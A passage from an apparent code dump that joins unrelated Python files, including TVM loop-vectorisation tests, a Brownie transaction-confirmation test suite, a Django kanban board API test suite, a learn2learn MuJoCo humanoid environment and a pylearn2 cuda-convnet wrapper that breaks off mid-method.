stmt = tvm.ir_pass.VectorizeLoop(stmt)
assert isinstance(stmt, tvm.stmt.For)
def test_vectorize_with_ge_cond():
n = tvm.var('n')
ib = tvm.ir_builder.create()
A = ib.pointer("float32", name="A")
with ib.for_range(0, 4, for_type="vectorize") as i:
with ib.if_scope(i >= n):
A[i] = A[i] + 1
stmt = ib.get()
stmt = tvm.ir_pass.VectorizeLoop(stmt)
assert isinstance(stmt, tvm.stmt.For)
def test_vectorize_if_then_else():
n = tvm.var('n')
x = tvm.var('x')
ib = tvm.ir_builder.create()
A = ib.pointer("float32", name="A")
with ib.for_range(0, 4, for_type="vectorize") as i:
A[i] = tvm.call_intrin("float32", "tvm_if_then_else",
i > 0,
A[i] + 1, A[i])
stmt = ib.get()
stmt = tvm.ir_pass.VectorizeLoop(stmt)
assert isinstance(stmt, tvm.stmt.For)
ib = tvm.ir_builder.create()
A = ib.pointer("float32", name="A")
with ib.for_range(0, n) as k:
with ib.for_range(0, 4, for_type="vectorize") as i:
A[k * 4 + i] = tvm.call_intrin("float32", "tvm_if_then_else",
k > 0,
A[k * 4 + i], 0)
stmt = ib.get()
assert isinstance(stmt.body, tvm.stmt.For)
stmt = tvm.ir_pass.VectorizeLoop(stmt)
assert not isinstance(stmt.body, tvm.stmt.For)
assert isinstance(stmt.body.value.args[2], tvm.expr.Broadcast)
if __name__ == "__main__":
test_vectorize_vector()
test_vectorize_with_if()
test_vectorize_loop()
test_vectorize_if_then_else()
test_vectorize_with_le_cond()
test_vectorize_with_ge_cond()
|
python_code/hash_chapter1_reimpl_js.py
|
possnfiffer/inside_python_dict
| 124 |
69826
|
from js_reimpl_common import run_op_chapter1_chapter2
def run_op(keys, op, **kwargs):
return run_op_chapter1_chapter2("chapter1", None, keys, op, **kwargs)
def create_new(numbers):
return run_op(None, "create_new", array=numbers)
def create_new_broken(numbers):
return run_op(None, "create_new_broken", array=numbers)
def has_key(keys, key):
return run_op(keys, "has_key", key=key)
def linear_search(numbers, key):
return run_op(None, "linear_search", key=key, array=numbers)
|
noisemaker/effects_registry.py
|
Kulinark/py-noisemaker
| 106 |
69832
|
<reponame>Kulinark/py-noisemaker<gh_stars>100-1000
"""Effect decorator for Noisemaker Composer Presets"""
import inspect
EFFECTS = {}
def effect(*args):
"""Function decorator for declaring composable effects."""
def decorator_fn(func):
argspec = inspect.getfullargspec(func)
params = argspec.args
for param in ["time", "speed"]:
if param not in params:
raise ValueError(f'{func.__name__}() needs to accept a "{param}" keyword arg. Please add it to the function signature.')
# All effects respond to "tensor", "shape". Removing these non-keyword args should make params the same length as defaults.
params.remove("tensor")
params.remove("shape")
if params and len(params) != len(argspec.defaults):
raise ValueError(f'Expected {len(argspec.defaults)} keyword params to "{func.__name__}", but got {len(params)}.')
# Register effect name and params
name = args[0] if args else func.__name__
EFFECTS[name] = dict((params[i], argspec.defaults[i]) for i in range(len(params)))
EFFECTS[name]["func"] = func
return func
return decorator_fn
|
tests/network/transaction/test_required_confirmations.py
|
ActorForth/brownie
| 1,595 |
69837
|
import threading
import time
import pytest
import brownie
def send_and_wait_for_tx():
tx = brownie.accounts[0].transfer(
brownie.accounts[1], "0.1 ether", required_confs=0, silent=True
)
tx.wait(2)
assert tx.confirmations >= 2
assert tx.status == 1
@pytest.fixture
def block_time_network(devnetwork, config, network_name):
"""Provide a network with fixed block mining time of 1 second."""
config.networks[network_name]["cmd_settings"]["block_time"] = 1
devnetwork.disconnect()
devnetwork.connect(network_name)
yield devnetwork
devnetwork.disconnect()
def test_required_confirmations_deploy(accounts, BrownieTester, block_time_network, web3):
block = web3.eth.block_number
accounts[0].deploy(BrownieTester, True, required_confs=3)
assert web3.eth.block_number - block >= 3
def test_required_confirmations_transfer(accounts, block_time_network, web3):
block = web3.eth.block_number
tx = accounts[0].transfer(accounts[1], "1 ether", required_confs=3)
assert tx.confirmations >= 3
assert web3.eth.block_number - block >= 3
def test_required_confirmations_transact(accounts, BrownieTester, block_time_network, web3):
block = web3.eth.block_number
brownieTester = BrownieTester.deploy(True, {"from": accounts[0], "required_confs": 2})
assert web3.eth.block_number - block >= 2
block = web3.eth.block_number
tx = brownieTester.doNothing({"from": accounts[0], "required_confs": 4})
assert tx.confirmations >= 4
assert web3.eth.block_number - block >= 4
def test_required_confirmations_zero(accounts, block_time_network, web3):
block = web3.eth.block_number
tx = accounts[0].transfer(accounts[1], "1 ether", required_confs=0)
assert tx.status == -1
assert web3.eth.block_number - block == 0
time.sleep(1.5)
assert tx.status == 1
assert tx.confirmations >= 1
def test_wait_for_confirmations(accounts, block_time_network):
tx = accounts[0].transfer(accounts[1], "1 ether", required_confs=1)
tx.wait(3)
assert tx.confirmations in [3, 4]
tx.wait(2)
tx.wait(5)
assert tx.confirmations >= 5
def test_pending_nonce(accounts, block_time_network):
for _ in range(3):
accounts[0].transfer(accounts[1], "0.1 ether", required_confs=0, silent=True)
assert accounts[0]._pending_nonce() == 3
assert accounts[0].nonce < 3
time.sleep(3.5)
assert accounts[0].nonce == 3
def test_multithreading(accounts, history, block_time_network):
threads = []
for _ in range(3):
thread = threading.Thread(target=send_and_wait_for_tx, daemon=True)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
for tx in history:
assert tx.status == 1
assert tx.confirmations >= 2
|
setup.py
|
annlor/energy-usage
| 141 |
69855
|
from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
NAME = "energyusage"
VERSION = "0.0.13"
DESCRIPTION = "Measuring the environmental impact of computation"
LONG_DESCRIPTION = long_description
LONG_DESCRIPTION_CONTENT_TYPE = 'text/markdown'
URL = "https://github.com/responsibleproblemsolving/energy-usage"
AUTHOR = "<NAME>, <NAME>, <NAME>"
AUTHOR_EMAIL = "<EMAIL>"
LICENSE = "Apache 2.0"
CLASSIFIERS = [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
]
PACKAGES = ['energyusage']
PACKAGE_DATA = {
'energyusage.data.csv' : ['*.csv'],
'energyusage.data.json' : ['*.json']
}
INCLUDE_PACKAGE_DATA = True
PACKAGE_DIR = {
'energyusage.data' : 'data'
}
INSTALL_REQUIRES = [
'requests',
'reportlab'
]
setup(
name= NAME,
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type = LONG_DESCRIPTION_CONTENT_TYPE,
url=URL,
author=AUTHOR,
author_email = AUTHOR_EMAIL,
license = LICENSE,
classifiers=CLASSIFIERS,
packages = PACKAGES,
package_data = PACKAGE_DATA,
include_package_data = INCLUDE_PACKAGE_DATA,
package_dir = PACKAGE_DIR,
install_requires=INSTALL_REQUIRES
)
|
learn2learn/gym/envs/mujoco/humanoid_direction.py
|
Brikwerk/learn2learn
| 1,774 |
69866
|
<gh_stars>1000+
#!/usr/bin/env python3
import gym
import numpy as np
from gym.error import DependencyNotInstalled
try:
from gym.envs.mujoco.mujoco_env import MujocoEnv
except DependencyNotInstalled:
from learn2learn.gym.envs.mujoco.dummy_mujoco_env import MujocoEnv
from learn2learn.gym.envs.meta_env import MetaEnv
def mass_center(model, sim):
mass = np.expand_dims(model.body_mass, 1)
xpos = sim.data.xipos
return (np.sum(mass * xpos, 0) / np.sum(mass))
class HumanoidDirectionEnv(MetaEnv, MujocoEnv, gym.utils.EzPickle):
"""
[[Source]](https://github.com/learnables/learn2learn/blob/master/learn2learn/gym/envs/mujoco/humanoid_direction.py)
**Description**
This environment requires the humanoid to learn to run in a random direction in the
XY plane. At each time step the humanoid receives a signal composed of a
control cost and a reward equal to its average velocity in the target direction.
The tasks are 2d-arrays sampled uniformly along the unit circle.
The target direction is indicated by the vector from the origin to the sampled point.
The velocity is calculated as the distance (in the target direction) of the humanoid's torso
position before and after taking the specified action divided by a small value dt.
A small positive bonus is added to the reward to stop the humanoid from
prematurely ending the episode.
**Credit**
Adapted from <NAME>' implementation.
**References**
1. Finn et al. 2017. "Model-Agnostic Meta-Learning for Fast Adaptation of Deep Networks." arXiv [cs.LG].
2. Rothfuss et al. 2018. "ProMP: Proximal Meta-Policy Search." arXiv [cs.LG].
"""
def __init__(self, task=None):
MetaEnv.__init__(self, task)
MujocoEnv.__init__(self, 'humanoid.xml', 5)
gym.utils.EzPickle.__init__(self)
# -------- MetaEnv Methods --------
def set_task(self, task):
MetaEnv.set_task(self, task)
self.goal_direction = task['direction']
def sample_tasks(self, num_tasks):
directions = np.random.normal(size=(num_tasks, 2))
directions /= np.linalg.norm(directions, axis=1)[..., np.newaxis]
tasks = [{'direction': direction} for direction in directions]
return tasks
# -------- Mujoco Methods --------
def _get_obs(self):
data = self.sim.data
return np.concatenate([data.qpos.flat[2:],
data.qvel.flat,
data.cinert.flat,
data.cvel.flat,
data.qfrc_actuator.flat,
data.cfrc_ext.flat])
def viewer_setup(self):
self.viewer.cam.trackbodyid = 1
self.viewer.cam.distance = self.model.stat.extent * 1.0
self.viewer.cam.elevation = -20
def reset_model(self):
c = 0.01
self.set_state(
self.init_qpos + self.np_random.uniform(low=-c, high=c, size=self.model.nq),
self.init_qvel + self.np_random.uniform(low=-c, high=c, size=self.model.nv, )
)
return self._get_obs()
# -------- Gym Methods --------
def step(self, action):
pos_before = np.copy(mass_center(self.model, self.sim)[:2])
self.do_simulation(action, self.frame_skip)
pos_after = mass_center(self.model, self.sim)[:2]
alive_bonus = 5.0
data = self.sim.data
lin_vel_cost = 0.25 * np.sum(self.goal_direction * (pos_after - pos_before)) / self.model.opt.timestep
quad_ctrl_cost = 0.1 * np.square(data.ctrl).sum()
quad_impact_cost = .5e-6 * np.square(data.cfrc_ext).sum()
quad_impact_cost = min(quad_impact_cost, 10)
reward = lin_vel_cost - quad_ctrl_cost - quad_impact_cost + alive_bonus
qpos = self.sim.data.qpos
done = bool((qpos[2] < 1.0) or (qpos[2] > 2.0))
return self._get_obs(), reward, done, dict(reward_linvel=lin_vel_cost,
reward_quadctrl=-quad_ctrl_cost,
reward_alive=alive_bonus,
reward_impact=-quad_impact_cost)
def reset(self, *args, **kwargs):
MujocoEnv.reset(self, *args, **kwargs)
return self._get_obs()
def render(self, mode='human'):
if mode == 'rgb_array':
self._get_viewer(mode).render()
# window size used for old mujoco-py:
width, height = 500, 500
data = self._get_viewer(mode).read_pixels(width,
height,
depth=False)
return data
elif mode == 'human':
self._get_viewer(mode).render()
if __name__ == '__main__':
env = HumanoidDirectionEnv()
for task in [env.get_task(), env.sample_tasks(1)[0]]:
env.set_task(task)
env.reset()
action = env.action_space.sample()
env.step(action)
|
api/v2/views/provider_type.py
|
simpsonw/atmosphere
| 197 |
69882
|
from core.models import ProviderType
from api.v2.serializers.details import ProviderTypeSerializer
from api.v2.views.base import AuthModelViewSet
class ProviderTypeViewSet(AuthModelViewSet):
"""
API endpoint that allows instance actions to be viewed or edited.
"""
queryset = ProviderType.objects.all()
serializer_class = ProviderTypeSerializer
http_method_names = ['get', 'head', 'options', 'trace']
|
docs/demos/theme_explorer/form.py
|
glsdown/dash-bootstrap-components
| 776 |
69883
|
import dash_bootstrap_components as dbc
from dash import html
from .util import make_subheading
form = html.Div(
[
make_subheading("Form", "form"),
dbc.Form(
[
html.Div(
[
dbc.Label("Username"),
dbc.Input(
placeholder="Enter your username",
type="text",
),
dbc.FormText(
[
"Can't remember your username? ",
html.A(
"Click here.",
href="#",
className="text-muted",
style={"textDecoration": "underline"},
),
]
),
]
),
html.Div(
[
dbc.Label("Username"),
dbc.Input(
placeholder="Enter your password",
type="password",
),
dbc.FormText(
[
"Can't remember your password? ",
html.A(
"Click here.",
href="#",
className="text-muted",
style={"textDecoration": "underline"},
),
]
),
]
),
]
),
],
className="mb-4",
)
|
backend/boards/tests/test_api.py
|
aibek79/Django-React-knboard
| 665 |
69909
|
import pytest
from django.contrib.auth import get_user_model
from rest_framework.reverse import reverse
from boards.models import Column, Board, Task
User = get_user_model()
@pytest.fixture
def board(create_user):
user = create_user()
uni_board = Board.objects.create(name="University", owner=user)
uni_board.members.add(user)
return uni_board
@pytest.fixture
def col_backlog(board):
return Column.objects.create(board=board, title="Backlog", column_order=1)
@pytest.fixture
def col_done(board):
return Column.objects.create(board=board, title="Done", column_order=2)
def test_order_columns(api_client_with_credentials, col_backlog, col_done):
"""
Order columns:
Backlog, Done -> Done, Backlog
"""
response = api_client_with_credentials.post(
reverse("sort-column"), {"order": [col_done.id, col_backlog.id]}
)
col_backlog.refresh_from_db()
col_done.refresh_from_db()
assert response.status_code == 200
assert col_done.column_order == 1
assert col_backlog.column_order == 2
def test_order_tasks_same_column(
api_client_with_credentials, column_factory, task_factory
):
"""
Order tasks (in one column):
Task1, Task2, Task3 -> Task3, Task1, Task2
"""
column = column_factory()
task1 = task_factory(column=column, task_order=1)
task2 = task_factory(column=column, task_order=2)
task3 = task_factory(column=column, task_order=3)
# Initial state
column.refresh_from_db()
assert list(column.tasks.all()) == [task1, task2, task3]
response = api_client_with_credentials.post(
reverse("sort-task"),
{
"board": column.board.id,
"tasks": {column.id: [task3.id, task1.id, task2.id]},
"order": [task3.id, task1.id, task2.id],
},
)
assert response.status_code == 200
# State after ordering
column.refresh_from_db()
assert list(column.tasks.all()) == [task3, task1, task2]
def test_order_tasks_between_two_columns(
api_client_with_credentials, board_factory, column_factory, task_factory
):
"""
Order tasks between two columns:
Column1: Task1, Task2, Task3
Column2: Task4, Task5
After order:
Column1: Task1, Task3
Column2: Task4, Task2, Task5
"""
board = board_factory()
column1 = column_factory(board=board)
column2 = column_factory(board=board)
task1 = task_factory(column=column1, task_order=1)
task2 = task_factory(column=column1, task_order=2)
task3 = task_factory(column=column1, task_order=3)
task4 = task_factory(column=column2, task_order=4)
task5 = task_factory(column=column2, task_order=5)
# Initial state
column1.refresh_from_db()
column2.refresh_from_db()
assert list(column1.tasks.all()) == [task1, task2, task3]
assert list(column2.tasks.all()) == [task4, task5]
response = api_client_with_credentials.post(
reverse("sort-task"),
{
"board": column1.board.id,
"tasks": {
column1.id: [task1.id, task3.id],
column2.id: [task4.id, task2.id, task5.id],
},
"order": [task1.id, task3.id, task4.id, task2.id, task5.id],
},
)
assert response.status_code == 200
# State after ordering
column1.refresh_from_db()
column2.refresh_from_db()
assert list(column1.tasks.all()) == [task1, task3]
assert list(column2.tasks.all()) == [task4, task2, task5]
def test_invalid_move_atomic(
api_client_with_credentials, board_factory, column_factory, task_factory
):
board = board_factory()
col1 = column_factory(board=board)
col2 = column_factory(board=board)
col3 = column_factory(board=board)
col1_task = task_factory(column=col1, task_order=1)
col2_task = task_factory(column=col2, task_order=2)
response = api_client_with_credentials.post(
reverse("sort-task"),
{
"board": board.id,
"tasks": {
col1.id: [col1_task.id, col2_task.id],
col3.id: [col1_task.id, col2_task.id],
},
"order": [col1_task.id, col2_task.id],
},
)
assert response.status_code == 400
# State should remain the same
col1.refresh_from_db()
col2.refresh_from_db()
col3.refresh_from_db()
assert list(col1.tasks.all()) == [col1_task]
assert list(col2.tasks.all()) == [col2_task]
assert list(col3.tasks.all()) == []
def test_can_not_order_tasks_between_two_boards(
api_client_with_credentials, board_factory, column_factory, task_factory
):
board1 = board_factory()
board2 = board_factory()
board1_col = column_factory(board=board1)
board2_col = column_factory(board=board2)
board1_task = task_factory(column=board1_col, task_order=1)
board2_task = task_factory(column=board2_col, task_order=2)
response = api_client_with_credentials.post(
reverse("sort-task"),
{
"board": board1.id,
"tasks": {
board1_col.id: [],
board2_col.id: [board1_task.id, board2_task.id],
},
"order": [board1_task.id, board2_task.id],
},
)
assert response.status_code == 400
def test_order_duplicate(api_client_with_credentials, col_done):
response = api_client_with_credentials.post(
reverse("sort-column"), {"order": [col_done.id, col_done.id]}
)
assert response.status_code == 400
@pytest.mark.parametrize(
"post_data,expected_status_code",
[
({"order": [1, 2]}, 200),
({"order": [1, 1]}, 400),
({"order": [-1]}, 400),
({"order": "nope"}, 400),
({"order": {"asd"}}, 400),
({"other": "bad data"}, 400),
({}, 400),
],
)
def test_order_column_status_code(
post_data, expected_status_code, api_client_with_credentials, board
):
Column.objects.create(id=1, board=board, title="col1")
Column.objects.create(id=2, board=board, title="col2")
response = api_client_with_credentials.post(reverse("sort-column"), post_data)
assert response.status_code == expected_status_code
def test_board_list(api_client, steve, amy, leo):
uni_board = Board.objects.create(name="University", owner=steve)
uni_board.members.set([steve, amy])
get_board_list = lambda: api_client.get(reverse("board-list"))
# Not authenticated
response = get_board_list()
assert response.status_code == 401
# Owner can see his own boards
api_client.force_authenticate(user=steve)
response = get_board_list()
assert response.status_code == 200
assert len(response.data) == 1
# Members can see the their boards
api_client.force_authenticate(user=amy)
response = get_board_list()
assert response.status_code == 200
assert len(response.data) == 1
# Not part of any boards, can't see any
api_client.force_authenticate(user=leo)
response = get_board_list()
assert response.status_code == 200
assert len(response.data) == 0
def test_board_detail(api_client, steve, amy, leo):
uni_board = Board.objects.create(name="University", owner=steve)
uni_board.members.set([steve, amy])
get_uni_board_detail = lambda: api_client.get(
reverse("board-detail", kwargs={"pk": uni_board.id})
)
# Not authenticated
response = get_uni_board_detail()
assert response.status_code == 401
# Owner can see his own board
api_client.force_authenticate(user=steve)
response = get_uni_board_detail()
assert response.status_code == 200
assert response.data["name"] == "University"
# Member can see the board
api_client.force_authenticate(user=amy)
response = get_uni_board_detail()
assert response.status_code == 200
assert response.data["name"] == "University"
# Not part of the board, can't see it
api_client.force_authenticate(user=leo)
response = get_uni_board_detail()
assert response.status_code == 404
def test_board_delete(api_client, steve, amy, leo):
uni_board = Board.objects.create(name="University", owner=steve)
uni_board.members.set([steve, amy])
delete_uni_board = lambda: api_client.delete(
reverse("board-detail", kwargs={"pk": uni_board.id})
)
# Not authenticated
response = delete_uni_board()
assert response.status_code == 401
assert Board.objects.filter(id=uni_board.id).exists()
# Not part of the board, can't see it
api_client.force_authenticate(user=leo)
response = delete_uni_board()
assert response.status_code == 404
assert Board.objects.filter(id=uni_board.id).exists()
# Member can't delete the board
api_client.force_authenticate(user=amy)
response = delete_uni_board()
assert response.status_code == 403
assert Board.objects.filter(id=uni_board.id).exists()
# Owner can see his own board
api_client.force_authenticate(user=steve)
response = delete_uni_board()
assert response.status_code == 204
assert not Board.objects.filter(id=uni_board.id).exists()
def test_board_create(api_client, steve, amy):
assert len(Board.objects.all()) == 0
create_board = lambda: api_client.post(reverse("board-list"), {"name": "Pets"})
# Not authenticated
response = create_board()
assert response.status_code == 401
assert len(Board.objects.all()) == 0
# Steve should be owner and member after creation
api_client.force_authenticate(user=steve)
response = create_board()
assert response.status_code == 201
assert len(Board.objects.all()) == 1
pets = Board.objects.get(name="Pets")
assert pets.owner == steve
assert list(pets.members.all()) == [steve]
# Amy should not see any boards
api_client.force_authenticate(user=amy)
response = api_client.get(reverse("board-list"))
assert response.status_code == 200
assert len(response.data) == 0
def test_board_invite_member(api_client, board_factory, steve, leo, amy):
board = board_factory(owner=steve)
board.members.set([leo, steve])
# Initially there are two members
assert len(board.members.all()) == 2
send_invite = lambda users_ids: api_client.post(
reverse("board-invite-member", kwargs={"pk": board.id}), {"users": users_ids}
)
# Not authenticated
response = send_invite([amy.id])
assert response.status_code == 401
assert len(board.members.all()) == 2
# Leo is not an owner and should not be able to invite others
api_client.force_authenticate(user=leo)
response = send_invite([amy.id])
assert response.status_code == 403
assert len(board.members.all()) == 2
# Steve as the owner should be able to successfully invite Amy
api_client.force_authenticate(user=steve)
response = send_invite([amy.id])
assert response.status_code == 200
assert len(board.members.all()) == 3
assert amy.id in list(map(lambda member: member.id, board.members.all()))
# Should handle adding an existing member
response = send_invite([steve.id])
assert response.status_code == 200
assert len(board.members.all()) == 3
# Should handle adding non existant user
response = send_invite([-1])
assert response.status_code == 400
assert len(board.members.all()) == 3
def test_board_remove_member(
api_client, board_factory, column_factory, task_factory, steve, leo, amy, mike
):
board = board_factory(owner=steve)
board.members.set([steve, leo, amy])
column = column_factory(board=board)
task = task_factory(column=column)
# Initially there are two members
assert len(board.members.all()) == 3
remove_member = lambda username: api_client.post(
reverse("board-remove-member", kwargs={"pk": board.id}), {"username": username}
)
# Not authenticated
response = remove_member(leo.username)
assert response.status_code == 401
assert len(board.members.all()) == 3
# Leo should not be able to remove Amy (Leo isn't the owner)
api_client.force_authenticate(user=leo)
response = remove_member(amy.username)
assert response.status_code == 403
assert len(board.members.all()) == 3
# Steve can't remove himself (the owner)
api_client.force_authenticate(user=steve)
response = remove_member(steve.username)
assert response.status_code == 400
assert len(board.members.all()) == 3
# Steve can't remove Mike (not a member of the board)
response = remove_member(mike.username)
assert response.status_code == 400
assert len(board.members.all()) == 3
# Steve can't remove a non existant user
response = remove_member("notvalidusername")
assert response.status_code == 400
assert len(board.members.all()) == 3
# Steve can remove Leo, should also remove Leo from tasks
task.assignees.set([leo])
assert len(task.assignees.all()) == 1
response = remove_member(leo.username)
assert response.status_code == 200
assert len(board.members.all()) == 2
assert leo.id not in list(map(lambda member: member.id, board.members.all()))
assert len(task.assignees.all()) == 0
def test_update_task_title(api_client, task_factory, steve, amy):
task = task_factory(title="Landing page design")
board = task.column.board
board.members.set([steve])
new_title = "Admin page permissions"
update_title = lambda: api_client.patch(
reverse("task-detail", kwargs={"pk": task.id}), {"title": new_title}
)
# Not authenticated
response = update_title()
assert response.status_code == 401
# Amy not a member, doesn't know about the task
api_client.force_authenticate(user=amy)
response = update_title()
assert response.status_code == 404
# Steve is a board member, can update
api_client.force_authenticate(user=steve)
response = update_title()
task.refresh_from_db()
assert response.status_code == 200
assert task.title == new_title
def test_delete_task(api_client, task_factory, steve, amy):
task = task_factory()
board = task.column.board
board.members.set([steve])
delete_task = lambda: api_client.delete(
reverse("task-detail", kwargs={"pk": task.id})
)
# Not authenticated
response = delete_task()
assert response.status_code == 401
# Amy not a member, doesn't know about the task
api_client.force_authenticate(user=amy)
response = delete_task()
assert response.status_code == 404
# Steve is a board member, can delete
api_client.force_authenticate(user=steve)
response = delete_task()
assert response.status_code == 204
assert not Task.objects.filter(id=task.id).exists()
def test_update_column_title(api_client, column_factory, steve, amy):
column = column_factory(title="On Hold")
board = column.board
board.members.set([steve])
new_title = "Ready"
update_column_title = lambda: api_client.patch(
reverse("column-detail", kwargs={"pk": column.id}), {"title": new_title}
)
# Not authenticated
response = update_column_title()
assert response.status_code == 401
# Amy not a member, doesn't know about the column
api_client.force_authenticate(user=amy)
response = update_column_title()
assert response.status_code == 404
# Steve is a board member, can update
api_client.force_authenticate(user=steve)
response = update_column_title()
column.refresh_from_db()
assert response.status_code == 200
assert column.title == new_title
def test_create_column(api_client, board_factory, steve, amy):
board = board_factory(name="Internals")
board.members.set([steve])
column_data = {"title": "Send verification email on Regiser", "board": board.id}
create_column = lambda post_data: api_client.post(reverse("column-list"), post_data)
# Not authenticated
response = create_column(column_data)
assert response.status_code == 401
# Amy not a member
api_client.force_authenticate(user=amy)
response = create_column(column_data)
assert response.status_code == 400
assert response.data[0] == "Must be a member of the board!"
# Steve is a board member, can create
api_client.force_authenticate(user=steve)
response = create_column(column_data)
assert response.status_code == 201
assert Column.objects.filter(title=column_data["title"]).exists()
def test_create_task(api_client, column_factory, steve, amy):
column = column_factory(title="Blocked")
board = column.board
board.members.set([steve])
task_data = {
"title": "Send verification email on Regiser",
"description": "<p>Send a verification email when a new user registers. "
"Email template is provided by Dave.</p><p><br></p><p>Use our main SMTP provider.</p>",
"column": column.id,
"labels": [],
"assignees": [steve.id],
"priority": "H",
}
create_task = lambda post_data: api_client.post(reverse("task-list"), post_data)
# Not authenticated
response = create_task(task_data)
assert response.status_code == 401
# Amy not a member
assert amy not in board.members.all()
api_client.force_authenticate(user=amy)
response = create_task(task_data)
assert response.status_code == 400
assert response.data[0] == "Must be a member of the board!"
# One of the assignees (amy) is not a member
api_client.force_authenticate(user=steve)
response = create_task({**task_data, "assignees": [steve.id, amy.id]})
assert response.status_code == 400
assert response.data[0] == "Can't assign someone who isn't a board member!"
# Steve is a board member, can create
api_client.force_authenticate(user=steve)
response = create_task(task_data)
assert response.status_code == 201
assert Task.objects.filter(title=task_data["title"]).exists()
def test_only_board_members_see_labels(
api_client, board_factory, label_factory, steve, amy
):
board = board_factory(name="Internals")
board.members.set([steve])
label = label_factory(name="Documentation", board=board)
get_label = lambda: api_client.get(reverse("label-detail", kwargs={"pk": label.id}))
# Steve is a board member, can get label
api_client.force_authenticate(user=steve)
response = get_label()
assert response.status_code == 200
# Amy is a not a board member, doesn't know about the label
api_client.force_authenticate(user=amy)
response = get_label()
assert response.status_code == 404
def test_add_labels_to_task(
api_client, board_factory, column_factory, task_factory, label_factory, steve, amy
):
board1 = board_factory()
board1.members.set([steve])
board2 = board_factory()
column1 = column_factory(board=board1)
label1 = label_factory(board=board1)
label2 = label_factory(board=board2)
task1 = task_factory(column=column1)
add_labels = lambda labels: api_client.patch(
reverse("task-detail", kwargs={"pk": task1.id}), {"labels": labels}
)
# Can't add a label when not a member
api_client.force_authenticate(user=amy)
response = add_labels([label1.id])
task1.refresh_from_db()
assert response.status_code == 404
assert len(task1.labels.all()) == 0
# Can't add a label from a different board
api_client.force_authenticate(user=steve)
response = add_labels([label1.id, label2.id])
task1.refresh_from_db()
assert response.status_code == 400
assert response.data[0] == "Can't set a label that doesn't belong to the board!"
assert len(task1.labels.all()) == 0
# Can add a label of this board as member
api_client.force_authenticate(user=steve)
response = add_labels([label1.id])
task1.refresh_from_db()
assert response.status_code == 200
assert [label.id for label in task1.labels.all()] == [label1.id]
def test_label_names_unique_per_board(
api_client, board_factory, label_factory, steve, amy
):
board = board_factory()
board.members.set([steve])
label1 = label_factory(board=board, name="Hotfix")
label_factory(board=board, name="Bug")
api_client.force_authenticate(user=steve)
response = api_client.patch(
reverse("label-detail", kwargs={"pk": label1.id}), {"name": "Bug"}
)
assert response.status_code == 400
|
pylearn2/sandbox/cuda_convnet/base_acts.py
|
ikervazquezlopez/Pylearn2
| 2,045 |
69949
|
"""
Base class for wrapping
"""
__authors__ = "<NAME>"
__copyright__ = "Copyright 2010-2012, Universite de Montreal"
__credits__ = ["<NAME>", "<NAME>"]
__license__ = "3-clause BSD"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
"""
This module may contain code copied directly or modified from cuda-convnet.
The copyright and licensing notice for this code is reproduced below:
/*
* Copyright (c) 2011, <NAME> (<EMAIL>)
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* - Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* - Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
"""
import warnings
import theano
from theano.compat import get_unbound_function
from theano import config
from theano.sandbox.cuda import GpuOp
from pylearn2.sandbox.cuda_convnet.shared_code import this_dir
from pylearn2.sandbox.cuda_convnet.convnet_compile import convnet_available
from pylearn2.sandbox.cuda_convnet.convnet_compile import cuda_convnet_loc
from pylearn2.utils import py_integer_types
import pylearn2.sandbox.cuda_convnet.pthreads
class BaseActs(GpuOp):
"""
Shared code for wrapping various convnet operations.
"""
def __init__(self, pad=0, partial_sum=None, stride=1):
if not isinstance(pad, py_integer_types):
raise TypeError("pad must be an int")
if not (pad >= 0):
raise ValueError("bad value of pad (must be non-negative): " +
str(pad))
self.partial_sum = partial_sum
self.pad = pad
self.stride = stride
self.copy_non_contiguous = 0
# TODO: support sparse connectivity pattern
self.dense_connectivity = True
def c_header_dirs(self):
if config.pthreads.inc_dir:
return [this_dir, config.pthreads.inc_dir]
else:
return [this_dir]
def c_headers(self):
return ['nvmatrix.cuh', 'cudaconv2.cuh']
def c_code_cache_version(self):
warnings.warn("No C-code cache version for %s" %
self.__class__.__name__)
return ()
def c_lib_dirs(self):
if config.pthreads.lib_dir:
return [cuda_convnet_loc, config.pthreads.lib_dir]
else:
return [cuda_convnet_loc]
def c_libraries(self):
if config.pthreads.lib:
return ['cuda_convnet', config.pthreads.lib]
else:
return ['cuda_convnet']
def _argument_contiguity_check(self, arg_name):
return """
if (!CudaNdarray_is_c_contiguous(%%(%(arg_name)s)s))
{
if (!(%(class_name_caps)s_COPY_NON_CONTIGUOUS)) {
PyErr_SetString(PyExc_ValueError,
"%(class)s: %(arg_name)s must be C contiguous");
%%(fail)s;
}
}
""" % {
'class': self.__class__.__name__,
'arg_name': arg_name,
'class_name_caps': self.__class__.__name__.upper(),
}
def _argument_dimension_check(self, arg_name, ndim):
return """
if (%%(%(arg_name)s)s->nd != %(ndim)d)
{
PyErr_Format(PyExc_ValueError,
"%(arg_name)s must have ndim=%(ndim)d, got nd=%%%%i",
%%(%(arg_name)s)s->nd);
%%(fail)s;
}
""" % locals()
def __eq__(self, other):
return (type(self) == type(other) and
